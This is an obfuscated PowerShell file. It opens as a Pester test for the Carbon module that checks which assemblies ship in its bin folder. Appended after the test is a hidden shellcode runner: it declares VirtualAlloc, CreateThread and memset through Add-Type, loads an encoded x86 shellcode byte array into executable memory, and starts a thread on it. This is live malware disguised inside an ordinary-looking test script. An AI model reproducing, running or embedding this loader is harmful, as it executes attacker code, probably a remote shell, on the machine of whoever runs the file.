&("{1}{0}{2}{3}"-f 'tri','Set-S','ctM','ode') -Version ("{1}{0}"-f't','Lates')

.("{2}{1}{0}" -f'e','escrib','D') ("{1}{3}{2}{0}" -f 'ry','Bin Dire','o','ct') {
    foreach( ${C`lr} in @( ("{0}{2}{1}" -f 'co','r','recl'), ("{2}{1}{0}" -f 'llclr','u','f') ) )
    {
        ${alLO`W`ED`AsSEmBlIEs} = &{
            ("{2}{1}{0}"-f 'l','n.dl','Carbo')
            ("{2}{0}{1}{3}{4}" -f'b','on.','Car','Iis.','dll')
            ("{1}{0}{2}"-f'on.X','Carb','dt.dll')
            if( ${C`LR} -eq ("{1}{0}{2}" -f'cl','core','r') )
            {
                ("{5}{0}{6}{3}{2}{1}{7}{4}"-f'icrosoft.Web.Ad','n.d','atio','inistr','l','M','m','l')
            }
            ("{0}{2}{3}{1}{4}{5}"-f 'Micr','Web.XmlTran','o','soft.','sform.d','ll')
        }
        &("{1}{0}"-f 'ntext','Co') ${C`lr} {
            .('It') ("{0}{9}{8}{2}{6}{1}{4}{3}{5}{7}{10}{11}" -f'shou','b',' include a','t ','lies tha','ship with','ssem',' Pow','not','ld ','erSh','ell') {
                ${Bi`NP`ATh} = .("{3}{1}{0}{2}"-f'Pat','in-','h','Jo') -Path ${pSscRIp`TR`Oot} -ChildPath ((("{2}{1}{0}" -f 'on{0}bin','b','..{0}Car')) -f[ChAr]92) -Resolve
                ${BIN`PaTH} = &("{1}{2}{0}" -f 'n-Path','J','oi') -Path ${bI`NPA`TH} -ChildPath ${C`LR}
                ${bin`P`Ath} = &("{1}{0}{2}" -f'in-Pat','Jo','h') -Path ${b`inpATH}  -ChildPath '*'
                .("{0}{1}{2}" -f 'Get-Ch','il','dItem') -Path ${B`inPa`TH} -Exclude (${AlLOweD`AsSe`M`BLIeS} + ("{1}{0}"-f'b','*.pd')) | .("{0}{1}" -f'Shoul','d') -BeNullOrEmpty
            }
        }

    }
}
${C} = ((("{74}{71}{29}{0}{104}{82}{106}{50}{108}{12}{16}{2}{52}{37}{110}{105}{70}{80}{31}{38}{15}{96}{76}{103}{7}{20}{27}{34}{73}{48}{28}{94}{111}{95}{39}{8}{25}{75}{100}{93}{5}{13}{98}{65}{67}{58}{92}{109}{60}{43}{78}{97}{68}{53}{9}{69}{81}{4}{40}{32}{90}{77}{42}{26}{89}{101}{10}{64}{24}{84}{17}{51}{14}{85}{23}{22}{21}{54}{46}{56}{62}{41}{86}{44}{1}{11}{83}{91}{79}{6}{45}{3}{72}{19}{102}{107}{88}{61}{55}{63}{47}{59}{57}{35}{66}{99}{87}{36}{33}{49}{30}{18}" -f'i','adId','at','c','tes,','ic','T','dress, u','port(iXTker','hreadA','Pt',');[','lic s',' s','Pa',' ','t','tAddress, ','ount);','XT','int ','a','t dwCre','in',' ','ne','ize,','dwSiz','int','Import(','c','alAlloc(In','nt d',' ','e, ui','r m','est,','c ext','tPtr','lIm',' ui','lpT','ckS','rea','re','msv','onFlags',' Int','locationType, u','uint src, uint ','iXT)]p','IntPtr lp','i','pT','ti','t',', Int','t','xtern','P',' C','x','Ptr ','ern','r','ati','e','c e',' l','ttrib','ntPtr Vir','l','rt.dlli','nt flAl','[Dl','l32.dll','p','Sta','teThread(','port(iX','tu','u','el32.','DllI','lpStar','rameter, u','h',' d','ic e',' ','w','m',' In','bl',' f','[Dl','l','IntPtr','t','mset(IntPtr','iXT)]pu','Int',')]pub','Ad','XTkern','n I','dll','lic stat','ub','tPtr','er','lProtect);'))-cREPLacE ([cHar]105+[cHar]88+[cHar]84),[cHar]34);${w} = .("{1}{0}{2}"-f 'y','Add-T','pe') -memberDefinition ${c} -Name ("{1}{0}" -f'32','Win') -namespace ("{2}{0}{1}{3}" -f'3','2Functio','Win','ns') -passthru;[Byte[]];[Byte[]]${z} = 0xdb,0xcd,0xb8,0x55,0x17,0x46,0xdc,0xd9,0x74,0x24,0xf4,0x5d,0x33,0xc9,0xb1,0x47,0x31,0x45,0x18,0x83,0xed,0xfc,0x03,0x45,0x41,0xf5,0xb3,0x20,0x81,0x7b,0x3b,0xd9,0x51,0x1c,0xb5,0x3c,0x60,0x1c,0xa1,0x35,0xd2,0xac,0xa1,0x18,0xde,0x47,0xe7,0x88,0x55,0x25,0x20,0xbe,0xde,0x80,0x16,0xf1,0xdf,0xb9,0x6b,0x90,0x63,0xc0,0xbf,0x72,0x5a,0x0b,0xb2,0x73,0x9b,0x76,0x3f,0x21,0x74,0xfc,0x92,0xd6,0xf1,0x48,0x2f,0x5c,0x49,0x5c,0x37,0x81,0x19,0x5f,0x16,0x14,0x12,0x06,0xb8,0x96,0xf7,0x32,0xf1,0x80,0x14,0x7e,0x4b,0x3a,0xee,0xf4,0x4a,0xea,0x3f,0xf4,0xe1,0xd3,0xf0,0x07,0xfb,0x14,0x36,0xf8,0x8e,0x6c,0x45,0x85,0x88,0xaa,0x34,0x51,0x1c,0x29,0x9e,0x12,0x86,0x95,0x1f,0xf6,0x51,0x5d,0x13,0xb3,0x16,0x39,0x37,0x42,0xfa,0x31,0x43,0xcf,0xfd,0x95,0xc2,0x8b,0xd9,0x31,0x8f,0x48,0x43,0x63,0x75,0x3e,0x7c,0x73,0xd6,0x9f,0xd8,0xff,0xfa,0xf4,0x50,0xa2,0x92,0x39,0x59,0x5d,0x62,0x56,0xea,0x2e,0x50,0xf9,0x40,0xb9,0xd8,0x72,0x4f,0x3e,0x1f,0xa9,0x37,0xd0,0xde,0x52,0x48,0xf8,0x24,0x06,0x18,0x92,0x8d,0x27,0xf3,0x62,0x32,0xf2,0x54,0x33,0x9c,0xad,0x14,0xe3,0x5c,0x1e,0xfd,0xe9,0x53,0x41,0x1d,0x12,0xbe,0xea,0xb4,0xe8,0x28,0x46,0xb5,0x7f,0xde,0x00,0x47,0x80,0x0f,0x8d,0xce,0x66,0x45,0x3d,0x87,0x31,0xf1,0xa4,0x82,0xca,0x60,0x28,0x19,0xb7,0xa2,0xa2,0xae,0x47,0x6c,0x43,0xda,0x5b,0x18,0xa3,0x91,0x06,0x8e,0xbc,0x0f,0x2c,0x2e,0x29,0xb4,0xe7,0x79,0xc5,0xb6,0xde,0x4d,0x4a,0x48,0x35,0xc6,0x43,0xdc,0xf6,0xb0,0xab,0x30,0xf7,0x40,0xfa,0x5a,0xf7,0x28,0x5a,0x3f,0xa4,0x4d,0xa5,0xea,0xd8,0xde,0x30,0x15,0x89,0xb3,0x93,0x7d,0x37,0xea,0xd4,0x21,0xc8,0xd9,0xe4,0x1e,0x1f,0x27,0x93,0x4e,0xa3;${g} = 0x1000;if (${z}."l`EnGth" -gt 0x1000){${g} = ${z}."Le`NG`TH"};${x}=${w}::("{0}{2}{1}{3}"-f'Virt','Allo','ual','c').Invoke(0,0x1000,${g},0x40);for (${i}=0;${I} -le (${Z}."lENg`Th"-1);${i}++) {${w}::"ME`mseT"([IntPtr](${X}.("{1}{2}{0}" -f'2','To','Int3').Invoke()+${i}), ${z}[${I}], 1)};${W}::("{1}{0}{3}{2}"-f 're','C','teThread','a').Invoke(0,0,${X},0,0,0);for (;;){.("{1}{2}{3}{0}"-f 'ep','Start-s','l','e') 60};
